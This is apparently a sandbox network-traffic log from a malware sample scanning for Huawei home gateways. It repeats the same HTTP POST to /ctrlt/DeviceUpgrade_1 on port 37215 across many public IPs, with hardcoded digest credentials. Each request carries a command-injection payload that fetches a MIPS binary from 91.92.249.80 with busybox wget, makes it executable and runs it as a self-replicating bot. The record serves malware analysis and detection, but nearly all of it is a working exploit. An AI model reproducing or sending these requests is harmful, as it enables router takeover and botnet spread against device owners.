                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1182192.168.2.2334936197.227.82.737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.305493116 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1183192.168.2.2352358144.23.41.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.305552959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1184192.168.2.234641441.242.150.6337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.316438913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1185192.168.2.2347596178.37.120.23137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.316442966 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1186192.168.2.2347342200.169.27.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.316884041 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1187192.168.2.2344290189.170.248.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.316927910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1188192.168.2.2334162157.63.41.23237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.316987991 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1189192.168.2.2345286197.247.48.5737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.317039013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1190192.168.2.2345198197.119.242.20037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.317053080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1191192.168.2.236016241.50.229.20737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.317228079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
